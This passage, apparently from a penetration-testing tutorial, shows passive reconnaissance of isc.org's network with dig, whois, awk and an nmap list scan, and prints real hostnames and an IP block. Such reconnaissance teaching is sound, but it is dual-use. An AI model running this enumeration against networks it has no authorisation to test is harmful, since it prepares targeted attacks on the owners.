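  'mail.example.com. 3600 IN A   192.0.2.25' |
awk '$4 == "A" {print $1, $5}'
```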


Using nmap (with other tools) for Information Gathering
Most of us know that nmap is the most awesome port scanner on the planet. So awesome (read: useful) that there is no other I use. I know, I know. There are utilities like “amap” and “LANguard” and a slew of others. I get it. Just like the different editions of the STAR WARS movies, they all have their uses. However, if you're done preaching religious differences (yes, Han shot first, we all know that), let's all settle down, take our seats and talk about the only port scanner that matters: nmap.

Yes, you can use it to perform a wide array of scans and perform host discovery through active scanning.

However, you might not know that you can use nmap to perform list scanning, which never touches the target box. This kind of scan helps you, the pen tester, in gathering information about a target.

You can start by using “host” and “dig” to get an initial set of hosts/IPs to begin your data mining.

So, using the examples above, we know the following:
QUERY: dig isc.org MX +nocomments +answer +nostats


ANSWER: isc.org. 7200 IN MX 10 mx.pao1.isc.org.

So, we can then further “dig” for:

QUERY: dig mx.pao1.isc.org +nocomments +answer +nostats

ANSWER: mx.pao1.isc.org. 3600 IN A 149.20.64.53

So, now we have an IP address. Using the “whois” command, we can determine the network block of IPs that contains this server.

QUERY: whois 149.20.64.53

ANSWER: user@host:~$ whois 149.20.64.53
#
# Query terms are ambiguous. The query is assumed to be:
# "n 149.20.64.53"
#
# Use "?" to get help.
#
#
# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=149.20.64.53?showDetails=true&showARIN=false
#
NetRange: 149.20.0.0 - 149.20.255.255
CIDR: 149.20.0.0/16
OriginAS:
NetName: ISC-NET3
NetHandle: NET-149-20-0-0-1
Parent: NET-149-0-0-0-0


We now know that isc.org owns 149.20.0.0 – 149.20.255.255, or, in CIDR notation, 149.20.0.0/16.
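Pulling that network block out of whois output is a one-liner. The printf lines below reuse the ARIN fields from the answer above, so the sketch runs without a live whois query:

```shell
# extract the CIDR line from saved whois output;
# the printf lines stand in for a real ARIN response
printf '%s\n' \
  'NetRange:       149.20.0.0 - 149.20.255.255' \
  'CIDR:           149.20.0.0/16' |
awk '/^CIDR:/ {print $2}'
```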

We can feed this particular information into nmap and have nmap perform reverse DNS lookups. Those lookups help determine which IPs are worth targeting with active scanning (if that is what we wish). Or we can use the information gleaned from nmap to start doing targeted queries of ports.

A list scan is an unobtrusive way to gather information to help you choose individual machines for targeting later.

So, let's use nmap now to perform a list scan of isc.org.

user@host:~$ nmap -sL isc.org/16

Starting Nmap 5.21 ( http://nmap.org ) at 2011-05-15 10:44 EDT
Nmap scan report for test-test-test.isc.org (149.20.64.1)
Nmap scan report for res1.sjc3.isc.org (149.20.64.2)
Nmap scan report for sfba.sns-pb.isc.org (149.20.64.3)
Nmap scan report for dlv.sfba.sns-pb.isc.org (149.20.64.4)
Nmap scan report for 149.20.64.5
Nmap scan report for 149.20.64.6
Nmap scan report for 149.20.64.19
Nmap scan report for bind.odvr.dns-oarc.net (149.20.64.20)
Nmap scan report for unbound.odvr.dns-oarc.net (149.20.64.21)
Nmap scan report for iana-testbed.odvr.dns-oarc.net (149.20.64.22)
Nmap scan report for 149.20.64.23
Nmap scan report for 149.20.64.24
Nmap scan report for sie.isc.org (149.20.64.25)
Nmap scan report for tools.isc.org (149.20.64.26)
Nmap scan report for zfa.sie.isc.org (149.20.64.27)
Nmap scan report for 149.20.64.28
Nmap scan report for 149.20.64.29
Nmap scan report for 149.20.64.30


So, as you can see, nmap has performed rDNS lookups on a number of hosts in the range and we now know a lot more hostnames than we did before. Now, we can start to infer uses and other information from the host names.
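When the range is large, you usually care most about the addresses that actually resolved. This sketch filters saved nmap -sL output down to the named hosts; the printf lines reuse report lines from the scan above:

```shell
# keep only the hosts whose rDNS resolved
# (in -sL output, those lines carry a parenthesized IP)
printf '%s\n' \
  'Nmap scan report for sie.isc.org (149.20.64.25)' \
  'Nmap scan report for 149.20.64.28' |
awk '/\(/ {sub(/^Nmap scan report for /, ""); print}'
```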

CONCLUSION
By using a combination of some simple tools, we, as pen testers, can quickly produce information about a target network that becomes useful for more targeted attacks. If you're ever hired to perform a pen test where the customer wants you to start with absolutely zero information, these techniques are extremely useful for getting a starting point.